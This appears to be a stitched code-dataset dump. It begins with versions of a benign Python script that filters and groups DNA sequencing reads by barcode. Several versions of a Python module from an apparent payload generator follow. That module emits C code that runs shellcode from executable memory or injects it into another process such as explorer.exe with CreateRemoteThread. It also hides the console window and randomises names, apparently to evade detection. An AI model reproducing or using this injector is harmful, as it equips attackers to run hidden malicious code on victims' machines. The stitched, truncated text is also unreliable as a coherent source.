len(forward_lines), 4)]\nforward_quality = [l.decode('utf-8').replace('\\n', '') for l in forward_quality\n ]\nbarcode_quality_scores = []\nfor line 
in forward_quality:\n scores = [ord(i) for i in line[:BARCODE_LENGTH]]\n barcode_quality_scores.append(np.mean(scores))\nforward_guide_donor_quality_scores = []\nfor line in forward_quality:\n scores = [ord(i) for i in line[BARCODE_LENGTH:]]\n forward_guide_donor_quality_scores.append(np.mean(scores))\nreverse_lines = []\nfor file in args.reverse_files:\n reverse_lines.extend(gzip.open(file).readlines())\nreverse_sequence = [reverse_lines[r] for r in range(1, len(reverse_lines), 4)]\nreverse_sequence = [l.decode('utf-8').replace('\\n', '') for l in\n reverse_sequence]\nreverse_quality = [reverse_lines[r] for r in range(3, len(reverse_lines), 4)]\nreverse_quality = [l.decode('utf-8').replace('\\n', '') for l in reverse_quality\n ]\nreverse_guide_donor_quality_scores = []\nfor line in reverse_quality:\n scores = [ord(i) for i in line]\n reverse_guide_donor_quality_scores.append(np.mean(scores))\nforward_sequence, reverse_sequence, barcodes = zip(*[(f, r, f[:\n BARCODE_LENGTH]) for f, r, fscore, fscore2, rscore in zip(\n forward_sequence, reverse_sequence, barcode_quality_scores,\n forward_guide_donor_quality_scores, reverse_guide_donor_quality_scores) if\n fscore >= BARCODE_QUALITY_CUTOFF and fscore2 >=\n GUIDE_DONOR_QUALITY_CUTOFF and rscore >= GUIDE_DONOR_QUALITY_CUTOFF])\nif READ_COUNT_CUTOFF != 0:\n barcodes_to_keep = [key for key, count in Counter(barcodes).items() if \n count >= READ_COUNT_CUTOFF]\n keep_dict = {g: (True) for g in barcodes_to_keep}\n forward_sequence, reverse_sequence, barcodes = zip(*[(f, r, b) for f, r,\n b in zip(forward_sequence, reverse_sequence, barcodes) if b in\n keep_dict])\ncount_dict = dict(Counter(barcodes))\npickle_out = open(OUTPUT_HEADER + '.read_count_dict', 'wb')\npickle.dump(count_dict, pickle_out, protocol=2)\npickle_out.close()\nLENGTH = len(set(barcodes))\ntotal_segments = int(args.total_segments)\nbarcode_list = list(set(barcodes))\nfor segment in range(0, total_segments):\n start = int(LENGTH / total_segments * segment)\n 
if segment + 1 == total_segments:\n sub_barcodes_set = barcode_list[start:]\n else:\n stop = int(LENGTH / total_segments * (segment + 1))\n sub_barcodes_set = barcode_list[start:stop]\n sub_barcodes_dict = {b: (True) for b in sub_barcodes_set}\n sub_forward, sub_reverse, sub_barcodes = zip(*[(f, r, b) for f, r, b in\n zip(forward_sequence, reverse_sequence, barcodes) if b in\n sub_barcodes_dict])\n R1_dict, R2_dict = {}, {}\n for f, r, b in zip(sub_forward, sub_reverse, sub_barcodes):\n if b not in R1_dict and b not in R2_dict:\n R1_dict[b] = [f]\n R2_dict[b] = [r]\n else:\n R1_dict[b].append(f)\n R2_dict[b].append(r)\n pickle_out = open(OUTPUT_HEADER + '_' + str(segment) + '-' + str(\n total_segments) + '.R1_dict', 'wb')\n pickle.dump(R1_dict, pickle_out, protocol=2)\n pickle_out.close()\n pickle_out = open(OUTPUT_HEADER + '_' + str(segment) + '-' + str(\n total_segments) + '.R2_dict', 'wb')\n pickle.dump(R2_dict, pickle_out, protocol=2)\n pickle_out.close()\n",
"step-4": "<mask token>\nfrom collections import Counter\nimport argparse\nimport gzip\nimport numpy as np\nimport pickle\nparser = argparse.ArgumentParser()\nparser.add_argument('-f', '-forward', required=True, help=\n 'forward sequencing files', nargs='+', action='store', dest='forward_files'\n )\nparser.add_argument('-r', '-reverse', required=True, help=\n 'reverse sequencing files', nargs='+', action='store', dest='reverse_files'\n )\nparser.add_argument('-s', '-segments', required=True, help=\n 'number of segments to split job into', action='store', dest=\n 'total_segments')\nparser.add_argument('-o', '-out', required=True, help=\n 'keyword for saving output files', action='store', dest='out')\nparser.add_argument('-c', '-cutoff', required=False, default=0, help=\n 'read count cutoff for barcodes to keep (default=0)', action='store',\n dest='cutoff')\nparser.add_argument('-b', '-barcode', required=False, default=31, help=\n 'length of barcode (default=31)', action='store', dest='barcode_length')\nparser.add_argument('-bq', '-bquality', required=False, default=53, help=\n 'ascii quality score cutoff for barcode (default=53)', action='store',\n dest='barcode_quality')\nparser.add_argument('-gdq', '-gdquality', required=False, default=55, help=\n 'ascii quality score cutoff for guide-donor (default=55)', action=\n 'store', dest='guide_donor_quality')\nargs = parser.parse_args()\nOUTPUT_HEADER = args.out\nREAD_COUNT_CUTOFF = int(args.cutoff)\nBARCODE_LENGTH = int(args.barcode_length)\nBARCODE_QUALITY_CUTOFF = int(args.barcode_quality)\nGUIDE_DONOR_QUALITY_CUTOFF = int(args.guide_donor_quality)\nforward_lines = []\nfor file in args.forward_files:\n forward_lines.extend(gzip.open(file).readlines())\nforward_sequence = [forward_lines[r] for r in range(1, len(forward_lines), 4)]\nforward_sequence = [l.decode('utf-8').replace('\\n', '') for l in\n forward_sequence]\nforward_quality = [forward_lines[r] for r in range(3, len(forward_lines), 4)]\nforward_quality = 
[l.decode('utf-8').replace('\\n', '') for l in forward_quality\n ]\nbarcode_quality_scores = []\nfor line in forward_quality:\n scores = [ord(i) for i in line[:BARCODE_LENGTH]]\n barcode_quality_scores.append(np.mean(scores))\nforward_guide_donor_quality_scores = []\nfor line in forward_quality:\n scores = [ord(i) for i in line[BARCODE_LENGTH:]]\n forward_guide_donor_quality_scores.append(np.mean(scores))\nreverse_lines = []\nfor file in args.reverse_files:\n reverse_lines.extend(gzip.open(file).readlines())\nreverse_sequence = [reverse_lines[r] for r in range(1, len(reverse_lines), 4)]\nreverse_sequence = [l.decode('utf-8').replace('\\n', '') for l in\n reverse_sequence]\nreverse_quality = [reverse_lines[r] for r in range(3, len(reverse_lines), 4)]\nreverse_quality = [l.decode('utf-8').replace('\\n', '') for l in reverse_quality\n ]\nreverse_guide_donor_quality_scores = []\nfor line in reverse_quality:\n scores = [ord(i) for i in line]\n reverse_guide_donor_quality_scores.append(np.mean(scores))\nforward_sequence, reverse_sequence, barcodes = zip(*[(f, r, f[:\n BARCODE_LENGTH]) for f, r, fscore, fscore2, rscore in zip(\n forward_sequence, reverse_sequence, barcode_quality_scores,\n forward_guide_donor_quality_scores, reverse_guide_donor_quality_scores) if\n fscore >= BARCODE_QUALITY_CUTOFF and fscore2 >=\n GUIDE_DONOR_QUALITY_CUTOFF and rscore >= GUIDE_DONOR_QUALITY_CUTOFF])\nif READ_COUNT_CUTOFF != 0:\n barcodes_to_keep = [key for key, count in Counter(barcodes).items() if \n count >= READ_COUNT_CUTOFF]\n keep_dict = {g: (True) for g in barcodes_to_keep}\n forward_sequence, reverse_sequence, barcodes = zip(*[(f, r, b) for f, r,\n b in zip(forward_sequence, reverse_sequence, barcodes) if b in\n keep_dict])\ncount_dict = dict(Counter(barcodes))\npickle_out = open(OUTPUT_HEADER + '.read_count_dict', 'wb')\npickle.dump(count_dict, pickle_out, protocol=2)\npickle_out.close()\nLENGTH = len(set(barcodes))\ntotal_segments = int(args.total_segments)\nbarcode_list = 
list(set(barcodes))\nfor segment in range(0, total_segments):\n start = int(LENGTH / total_segments * segment)\n if segment + 1 == total_segments:\n sub_barcodes_set = barcode_list[start:]\n else:\n stop = int(LENGTH / total_segments * (segment + 1))\n sub_barcodes_set = barcode_list[start:stop]\n sub_barcodes_dict = {b: (True) for b in sub_barcodes_set}\n sub_forward, sub_reverse, sub_barcodes = zip(*[(f, r, b) for f, r, b in\n zip(forward_sequence, reverse_sequence, barcodes) if b in\n sub_barcodes_dict])\n R1_dict, R2_dict = {}, {}\n for f, r, b in zip(sub_forward, sub_reverse, sub_barcodes):\n if b not in R1_dict and b not in R2_dict:\n R1_dict[b] = [f]\n R2_dict[b] = [r]\n else:\n R1_dict[b].append(f)\n R2_dict[b].append(r)\n pickle_out = open(OUTPUT_HEADER + '_' + str(segment) + '-' + str(\n total_segments) + '.R1_dict', 'wb')\n pickle.dump(R1_dict, pickle_out, protocol=2)\n pickle_out.close()\n pickle_out = open(OUTPUT_HEADER + '_' + str(segment) + '-' + str(\n total_segments) + '.R2_dict', 'wb')\n pickle.dump(R2_dict, pickle_out, protocol=2)\n pickle_out.close()\n",
"step-5": "\"\"\"\nProcess pair-end reads of barcode-guide-donor Step 1 cassette to generate a library reference table mapping barcodes to features.\nCreate dictionaries mapping barcodes to forward and reverse reads, split into sub-segments.\n\nR1_dict: map barcodes to corresponding R1 sequences.\nR2_dict: map barcodes to corresponding R2 sequences.\nread_count_dict: map each barcode to corresponding total number of reads.\n\n\"\"\"\n\nfrom collections import Counter\nimport argparse\nimport gzip\nimport numpy as np\nimport pickle\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-f', '-forward', required=True, help=\"forward sequencing files\", nargs='+', action='store', dest='forward_files')\nparser.add_argument('-r', '-reverse', required=True, help=\"reverse sequencing files\", nargs='+', action='store', dest='reverse_files')\nparser.add_argument('-s', '-segments', required=True, help=\"number of segments to split job into\", action='store', dest='total_segments')\nparser.add_argument('-o', '-out', required=True, help=\"keyword for saving output files\", action='store', dest='out')\nparser.add_argument('-c', '-cutoff', required=False, default=0, help=\"read count cutoff for barcodes to keep (default=0)\", action='store', dest='cutoff')\nparser.add_argument('-b', '-barcode', required=False, default=31, help=\"length of barcode (default=31)\", action='store', dest='barcode_length')\nparser.add_argument('-bq', '-bquality', required=False, default=53, help=\"ascii quality score cutoff for barcode (default=53)\", action='store', dest='barcode_quality')\nparser.add_argument('-gdq', '-gdquality', required=False, default=55, help=\"ascii quality score cutoff for guide-donor (default=55)\", action='store', dest='guide_donor_quality')\n\nargs = parser.parse_args()\n\nOUTPUT_HEADER = args.out\nREAD_COUNT_CUTOFF = int(args.cutoff)\nBARCODE_LENGTH = int(args.barcode_length)\nBARCODE_QUALITY_CUTOFF = int(args.barcode_quality)\nGUIDE_DONOR_QUALITY_CUTOFF = 
int(args.guide_donor_quality)\n\n# Collect all sequencing reads from forward files.\nforward_lines = []\nfor file in args.forward_files:\n\tforward_lines.extend(gzip.open(file).readlines())\n\n# Forward sequence.\nforward_sequence = [forward_lines[r] for r in range(1, len(forward_lines), 4)]\nforward_sequence = [l.decode('utf-8').replace(\"\\n\",\"\") for l in forward_sequence]\n\n# Forward sequence quality scores.\nforward_quality = [forward_lines[r] for r in range(3, len(forward_lines), 4)]\nforward_quality = [l.decode('utf-8').replace(\"\\n\",\"\") for l in forward_quality]\n\nbarcode_quality_scores = [] # Barcode quality.\nfor line in forward_quality:\n scores = [ord(i) for i in line[:BARCODE_LENGTH]]\n barcode_quality_scores.append(np.mean(scores))\n\nforward_guide_donor_quality_scores = [] # Guide-donor quality.\nfor line in forward_quality:\n scores = [ord(i) for i in line[BARCODE_LENGTH:]]\n forward_guide_donor_quality_scores.append(np.mean(scores))\n\n# Collect all sequencing reads from reverse files.\nreverse_lines = []\nfor file in args.reverse_files:\n\treverse_lines.extend(gzip.open(file).readlines())\n\n# Reverse sequence.\nreverse_sequence = [reverse_lines[r] for r in range(1, len(reverse_lines), 4)]\nreverse_sequence = [l.decode('utf-8').replace(\"\\n\",\"\") for l in reverse_sequence]\n\n# Reverse sequence base quality scores.\nreverse_quality = [reverse_lines[r] for r in range(3, len(reverse_lines), 4)]\nreverse_quality = [l.decode('utf-8').replace(\"\\n\",\"\") for l in reverse_quality]\n\nreverse_guide_donor_quality_scores = []\nfor line in reverse_quality:\n scores = [ord(i) for i in line]\n reverse_guide_donor_quality_scores.append(np.mean(scores))\n\n# Filter out low quality barcodes and low quality guide-donor sequences.\nforward_sequence, reverse_sequence, barcodes = zip(*[(f, r, f[:BARCODE_LENGTH]) for f, r, fscore, fscore2, rscore\n in zip(forward_sequence, reverse_sequence, barcode_quality_scores, forward_guide_donor_quality_scores, 
reverse_guide_donor_quality_scores) \n if (fscore >= BARCODE_QUALITY_CUTOFF) and (fscore2 >= GUIDE_DONOR_QUALITY_CUTOFF) and (rscore >= GUIDE_DONOR_QUALITY_CUTOFF)])\n\nif (READ_COUNT_CUTOFF != 0): # optional choice to remove low read barcodes from annotations.\n\tbarcodes_to_keep = [key for key, count in Counter(barcodes).items() if count >= READ_COUNT_CUTOFF]\n\tkeep_dict = {g: True for g in barcodes_to_keep}\n\tforward_sequence, reverse_sequence, barcodes = zip(*[(f, r, b) for f, r, b \n\t\tin zip(forward_sequence, reverse_sequence, barcodes) if b in keep_dict])\n\n# Store barcode read count dictionary for later use. \ncount_dict = dict(Counter(barcodes))\npickle_out = open(OUTPUT_HEADER + \".read_count_dict\", \"wb\")\npickle.dump(count_dict, pickle_out, protocol=2)\npickle_out.close()\n\n# Divide up barcodes into specified number of segments for parallel analysis.\nLENGTH = len(set(barcodes))\ntotal_segments = int(args.total_segments)\n\nbarcode_list = list(set(barcodes))\nfor segment in range(0, total_segments):\n\tstart = int((LENGTH/total_segments)*segment) # determine start and end position of segment.\n\tif (segment+1 == total_segments):\n\t\tsub_barcodes_set = barcode_list[start:]\n\telse:\n\t\tstop = int((LENGTH/total_segments)*(segment+1))\n\t\tsub_barcodes_set = barcode_list[start:stop]\n\tsub_barcodes_dict = {b: True for b in sub_barcodes_set}\n\n\tsub_forward, sub_reverse, sub_barcodes = zip(*[(f, r, b) for f, r, b \n\t\tin zip(forward_sequence, reverse_sequence, barcodes) if b in sub_barcodes_dict])\n\n\tR1_dict, R2_dict = {}, {} # store reads by barcode into R1 and R2 dictionaries.\n\tfor f, r, b in zip(sub_forward, sub_reverse, sub_barcodes):\n\t\tif (b not in R1_dict) and (b not in R2_dict):\n\t\t\tR1_dict[b] = [f]\n\t\t\tR2_dict[b] = [r]\n\t\telse:\n\t\t\tR1_dict[b].append(f)\n\t\t\tR2_dict[b].append(r)\n\n\tpickle_out = open(OUTPUT_HEADER + \"_\" + str(segment) + \"-\" + str(total_segments) + \".R1_dict\", \"wb\")\n\tpickle.dump(R1_dict, 
pickle_out, protocol=2)\n\tpickle_out.close()\n\n\tpickle_out = open(OUTPUT_HEADER + \"_\" + str(segment) + \"-\" + str(total_segments) + \".R2_dict\", \"wb\")\n\tpickle.dump(R2_dict, pickle_out, protocol=2)\n\tpickle_out.close()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def Start():
Start_Code = '#include <windows.h>\n'
Start_Code += '#include <tlhelp32.h>\n'
Start_Code += '#include <stdio.h>\n'
Start_Code += '#include <stdlib.h>\n'
Start_Code += '#include <string.h>\n'
Start_Code += 'int main(int argc, char **argv) {'
Start_Code += 'char ' + Shellcode + '[] = {'
return Start_Code
<|reserved_special_token_0|>
def Local_Or_Remote():
print(
"""
|---------------------------------------|
| [1] Local Thread Injection (DEFAULT); |
| [2] Remote Thread Injection; |
|---------------------------------------|
"""
)
Choice = core.core_input()
if Choice == '1':
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
elif Choice == '2':
print(
"""
|-----------------------------------------------------|
| Which process to inject ? (DEFAULT = explorer.exe); |
|-----------------------------------------------------|
"""
)
ProcessName = core.core_input()
if ProcessName != '':
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
ProcessName = 'explorer.exe'
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
def End_Local_Thread_Injection():
Exec = gen.Varname_Creator()
Local_Thread_Injection = ('void *' + Exec +
' = VirtualAlloc(0, sizeof ' + Shellcode +
', MEM_COMMIT, PAGE_EXECUTE_READWRITE);')
Local_Thread_Injection += ('memcpy(' + Exec + ', ' + Shellcode +
', sizeof ' + Shellcode + ');')
Local_Thread_Injection += '((void(*)())' + Exec + ')();}'
return Local_Thread_Injection
def End_Remote_Thread_Injection(ProcessName):
Entry = gen.Varname_Creator()
Snapshot = gen.Varname_Creator()
Process_Handle = gen.Varname_Creator()
Remote_Thread = gen.Varname_Creator()
Remote_Buffer = gen.Varname_Creator()
Remote_Thread_Injection = 'PROCESSENTRY32 ' + Entry + ';'
Remote_Thread_Injection += Entry + '.dwSize = sizeof(PROCESSENTRY32);'
Remote_Thread_Injection += ('HANDLE ' + Snapshot +
' = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);')
Remote_Thread_Injection += ('if (Process32First(' + Snapshot + ', &' +
Entry + ') == TRUE){')
Remote_Thread_Injection += ('while (Process32Next(' + Snapshot + ', &' +
Entry + ') == TRUE){')
Remote_Thread_Injection += ('if (stricmp(' + Entry + '.szExeFile, ' +
'"' + ProcessName + '"' + ') == 0){')
Remote_Thread_Injection += 'HANDLE ' + Process_Handle + ';'
Remote_Thread_Injection += 'HANDLE ' + Remote_Thread + ';'
Remote_Thread_Injection += 'PVOID ' + Remote_Buffer + ';'
Remote_Thread_Injection += (Process_Handle +
' = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ' + Entry +
'.th32ProcessID);')
Remote_Thread_Injection += (Remote_Buffer + ' = VirtualAllocEx(' +
Process_Handle + ', NULL, sizeof ' + Shellcode +
', (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);')
Remote_Thread_Injection += ('WriteProcessMemory(' + Process_Handle +
', ' + Remote_Buffer + ', ' + Shellcode + ', sizeof ' + Shellcode +
', NULL);')
Remote_Thread_Injection += (Remote_Thread + ' = CreateRemoteThread(' +
Process_Handle + ', NULL, 0, (LPTHREAD_START_ROUTINE)' +
Remote_Buffer + ', NULL, 0, NULL);')
Remote_Thread_Injection += 'CloseHandle(' + Process_Handle + ');}}}'
Remote_Thread_Injection += 'CloseHandle(' + Snapshot + ');}'
return Remote_Thread_Injection
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def Start():
Start_Code = '#include <windows.h>\n'
Start_Code += '#include <tlhelp32.h>\n'
Start_Code += '#include <stdio.h>\n'
Start_Code += '#include <stdlib.h>\n'
Start_Code += '#include <string.h>\n'
Start_Code += 'int main(int argc, char **argv) {'
Start_Code += 'char ' + Shellcode + '[] = {'
return Start_Code
def Hide_Window_Console():
Hide_Window_Console_Code = ('};\nHWND ' + Hide_Window +
' = GetConsoleWindow();')
Hide_Window_Console_Code += 'ShowWindow(' + Hide_Window + ', SW_HIDE);'
return Hide_Window_Console_Code
def Local_Or_Remote():
print(
"""
|---------------------------------------|
| [1] Local Thread Injection (DEFAULT); |
| [2] Remote Thread Injection; |
|---------------------------------------|
"""
)
Choice = core.core_input()
if Choice == '1':
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
elif Choice == '2':
print(
"""
|-----------------------------------------------------|
| Which process to inject ? (DEFAULT = explorer.exe); |
|-----------------------------------------------------|
"""
)
ProcessName = core.core_input()
if ProcessName != '':
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
ProcessName = 'explorer.exe'
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
def End_Local_Thread_Injection():
Exec = gen.Varname_Creator()
Local_Thread_Injection = ('void *' + Exec +
' = VirtualAlloc(0, sizeof ' + Shellcode +
', MEM_COMMIT, PAGE_EXECUTE_READWRITE);')
Local_Thread_Injection += ('memcpy(' + Exec + ', ' + Shellcode +
', sizeof ' + Shellcode + ');')
Local_Thread_Injection += '((void(*)())' + Exec + ')();}'
return Local_Thread_Injection
def End_Remote_Thread_Injection(ProcessName):
Entry = gen.Varname_Creator()
Snapshot = gen.Varname_Creator()
Process_Handle = gen.Varname_Creator()
Remote_Thread = gen.Varname_Creator()
Remote_Buffer = gen.Varname_Creator()
Remote_Thread_Injection = 'PROCESSENTRY32 ' + Entry + ';'
Remote_Thread_Injection += Entry + '.dwSize = sizeof(PROCESSENTRY32);'
Remote_Thread_Injection += ('HANDLE ' + Snapshot +
' = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);')
Remote_Thread_Injection += ('if (Process32First(' + Snapshot + ', &' +
Entry + ') == TRUE){')
Remote_Thread_Injection += ('while (Process32Next(' + Snapshot + ', &' +
Entry + ') == TRUE){')
Remote_Thread_Injection += ('if (stricmp(' + Entry + '.szExeFile, ' +
'"' + ProcessName + '"' + ') == 0){')
Remote_Thread_Injection += 'HANDLE ' + Process_Handle + ';'
Remote_Thread_Injection += 'HANDLE ' + Remote_Thread + ';'
Remote_Thread_Injection += 'PVOID ' + Remote_Buffer + ';'
Remote_Thread_Injection += (Process_Handle +
' = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ' + Entry +
'.th32ProcessID);')
Remote_Thread_Injection += (Remote_Buffer + ' = VirtualAllocEx(' +
Process_Handle + ', NULL, sizeof ' + Shellcode +
', (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);')
Remote_Thread_Injection += ('WriteProcessMemory(' + Process_Handle +
', ' + Remote_Buffer + ', ' + Shellcode + ', sizeof ' + Shellcode +
', NULL);')
Remote_Thread_Injection += (Remote_Thread + ' = CreateRemoteThread(' +
Process_Handle + ', NULL, 0, (LPTHREAD_START_ROUTINE)' +
Remote_Buffer + ', NULL, 0, NULL);')
Remote_Thread_Injection += 'CloseHandle(' + Process_Handle + ');}}}'
Remote_Thread_Injection += 'CloseHandle(' + Snapshot + ');}'
return Remote_Thread_Injection
<|reserved_special_token_1|>
<|reserved_special_token_0|>
Shellcode = gen.Varname_Creator()
Hide_Window = gen.Varname_Creator()
def Start():
Start_Code = '#include <windows.h>\n'
Start_Code += '#include <tlhelp32.h>\n'
Start_Code += '#include <stdio.h>\n'
Start_Code += '#include <stdlib.h>\n'
Start_Code += '#include <string.h>\n'
Start_Code += 'int main(int argc, char **argv) {'
Start_Code += 'char ' + Shellcode + '[] = {'
return Start_Code
def Hide_Window_Console():
Hide_Window_Console_Code = ('};\nHWND ' + Hide_Window +
' = GetConsoleWindow();')
Hide_Window_Console_Code += 'ShowWindow(' + Hide_Window + ', SW_HIDE);'
return Hide_Window_Console_Code
def Local_Or_Remote():
print(
"""
|---------------------------------------|
| [1] Local Thread Injection (DEFAULT); |
| [2] Remote Thread Injection; |
|---------------------------------------|
"""
)
Choice = core.core_input()
if Choice == '1':
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
elif Choice == '2':
print(
"""
|-----------------------------------------------------|
| Which process to inject ? (DEFAULT = explorer.exe); |
|-----------------------------------------------------|
"""
)
ProcessName = core.core_input()
if ProcessName != '':
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
ProcessName = 'explorer.exe'
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
def End_Local_Thread_Injection():
Exec = gen.Varname_Creator()
Local_Thread_Injection = ('void *' + Exec +
' = VirtualAlloc(0, sizeof ' + Shellcode +
', MEM_COMMIT, PAGE_EXECUTE_READWRITE);')
Local_Thread_Injection += ('memcpy(' + Exec + ', ' + Shellcode +
', sizeof ' + Shellcode + ');')
Local_Thread_Injection += '((void(*)())' + Exec + ')();}'
return Local_Thread_Injection
def End_Remote_Thread_Injection(ProcessName):
Entry = gen.Varname_Creator()
Snapshot = gen.Varname_Creator()
Process_Handle = gen.Varname_Creator()
Remote_Thread = gen.Varname_Creator()
Remote_Buffer = gen.Varname_Creator()
Remote_Thread_Injection = 'PROCESSENTRY32 ' + Entry + ';'
Remote_Thread_Injection += Entry + '.dwSize = sizeof(PROCESSENTRY32);'
Remote_Thread_Injection += ('HANDLE ' + Snapshot +
' = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);')
Remote_Thread_Injection += ('if (Process32First(' + Snapshot + ', &' +
Entry + ') == TRUE){')
Remote_Thread_Injection += ('while (Process32Next(' + Snapshot + ', &' +
Entry + ') == TRUE){')
Remote_Thread_Injection += ('if (stricmp(' + Entry + '.szExeFile, ' +
'"' + ProcessName + '"' + ') == 0){')
Remote_Thread_Injection += 'HANDLE ' + Process_Handle + ';'
Remote_Thread_Injection += 'HANDLE ' + Remote_Thread + ';'
Remote_Thread_Injection += 'PVOID ' + Remote_Buffer + ';'
Remote_Thread_Injection += (Process_Handle +
' = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ' + Entry +
'.th32ProcessID);')
Remote_Thread_Injection += (Remote_Buffer + ' = VirtualAllocEx(' +
Process_Handle + ', NULL, sizeof ' + Shellcode +
', (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);')
Remote_Thread_Injection += ('WriteProcessMemory(' + Process_Handle +
', ' + Remote_Buffer + ', ' + Shellcode + ', sizeof ' + Shellcode +
', NULL);')
Remote_Thread_Injection += (Remote_Thread + ' = CreateRemoteThread(' +
Process_Handle + ', NULL, 0, (LPTHREAD_START_ROUTINE)' +
Remote_Buffer + ', NULL, 0, NULL);')
Remote_Thread_Injection += 'CloseHandle(' + Process_Handle + ');}}}'
Remote_Thread_Injection += 'CloseHandle(' + Snapshot + ');}'
return Remote_Thread_Injection
<|reserved_special_token_1|>
from lib import gen, core
Shellcode = gen.Varname_Creator()
Hide_Window = gen.Varname_Creator()
def Start():
Start_Code = '#include <windows.h>\n'
Start_Code += '#include <tlhelp32.h>\n'
Start_Code += '#include <stdio.h>\n'
Start_Code += '#include <stdlib.h>\n'
Start_Code += '#include <string.h>\n'
Start_Code += 'int main(int argc, char **argv) {'
Start_Code += 'char ' + Shellcode + '[] = {'
return Start_Code
def Hide_Window_Console():
Hide_Window_Console_Code = ('};\nHWND ' + Hide_Window +
' = GetConsoleWindow();')
Hide_Window_Console_Code += 'ShowWindow(' + Hide_Window + ', SW_HIDE);'
return Hide_Window_Console_Code
def Local_Or_Remote():
print(
"""
|---------------------------------------|
| [1] Local Thread Injection (DEFAULT); |
| [2] Remote Thread Injection; |
|---------------------------------------|
"""
)
Choice = core.core_input()
if Choice == '1':
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
elif Choice == '2':
print(
"""
|-----------------------------------------------------|
| Which process to inject ? (DEFAULT = explorer.exe); |
|-----------------------------------------------------|
"""
)
ProcessName = core.core_input()
if ProcessName != '':
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
ProcessName = 'explorer.exe'
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
def End_Local_Thread_Injection():
Exec = gen.Varname_Creator()
Local_Thread_Injection = ('void *' + Exec +
' = VirtualAlloc(0, sizeof ' + Shellcode +
', MEM_COMMIT, PAGE_EXECUTE_READWRITE);')
Local_Thread_Injection += ('memcpy(' + Exec + ', ' + Shellcode +
', sizeof ' + Shellcode + ');')
Local_Thread_Injection += '((void(*)())' + Exec + ')();}'
return Local_Thread_Injection
def End_Remote_Thread_Injection(ProcessName):
Entry = gen.Varname_Creator()
Snapshot = gen.Varname_Creator()
Process_Handle = gen.Varname_Creator()
Remote_Thread = gen.Varname_Creator()
Remote_Buffer = gen.Varname_Creator()
Remote_Thread_Injection = 'PROCESSENTRY32 ' + Entry + ';'
Remote_Thread_Injection += Entry + '.dwSize = sizeof(PROCESSENTRY32);'
Remote_Thread_Injection += ('HANDLE ' + Snapshot +
' = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);')
Remote_Thread_Injection += ('if (Process32First(' + Snapshot + ', &' +
Entry + ') == TRUE){')
Remote_Thread_Injection += ('while (Process32Next(' + Snapshot + ', &' +
Entry + ') == TRUE){')
Remote_Thread_Injection += ('if (stricmp(' + Entry + '.szExeFile, ' +
'"' + ProcessName + '"' + ') == 0){')
Remote_Thread_Injection += 'HANDLE ' + Process_Handle + ';'
Remote_Thread_Injection += 'HANDLE ' + Remote_Thread + ';'
Remote_Thread_Injection += 'PVOID ' + Remote_Buffer + ';'
Remote_Thread_Injection += (Process_Handle +
' = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ' + Entry +
'.th32ProcessID);')
Remote_Thread_Injection += (Remote_Buffer + ' = VirtualAllocEx(' +
Process_Handle + ', NULL, sizeof ' + Shellcode +
', (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);')
Remote_Thread_Injection += ('WriteProcessMemory(' + Process_Handle +
', ' + Remote_Buffer + ', ' + Shellcode + ', sizeof ' + Shellcode +
', NULL);')
Remote_Thread_Injection += (Remote_Thread + ' = CreateRemoteThread(' +
Process_Handle + ', NULL, 0, (LPTHREAD_START_ROUTINE)' +
Remote_Buffer + ', NULL, 0, NULL);')
Remote_Thread_Injection += 'CloseHandle(' + Process_Handle + ');}}}'
Remote_Thread_Injection += 'CloseHandle(' + Snapshot + ');}'
return Remote_Thread_Injection
<|reserved_special_token_1|>
from lib import gen, core
Shellcode = gen.Varname_Creator()
Hide_Window = gen.Varname_Creator()
def Start():
Start_Code = "#include <windows.h>\n"
Start_Code += "#include <tlhelp32.h>\n"
Start_Code += "#include <stdio.h>\n"
Start_Code += "#include <stdlib.h>\n"
Start_Code += "#include <string.h>\n"
Start_Code += "int main(int argc, char **argv) {"
Start_Code += "char " + Shellcode + "[] = {"
return Start_Code
def Hide_Window_Console():
Hide_Window_Console_Code = "};\nHWND " + Hide_Window + " = GetConsoleWindow();"
Hide_Window_Console_Code += "ShowWindow(" + Hide_Window + ", SW_HIDE);"
return Hide_Window_Console_Code
def Local_Or_Remote():
print("""
|---------------------------------------|
| [1] Local Thread Injection (DEFAULT); |
| [2] Remote Thread Injection; |
|---------------------------------------|
""")
Choice = core.core_input()
if Choice == "1":
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
elif Choice == "2":
print("""
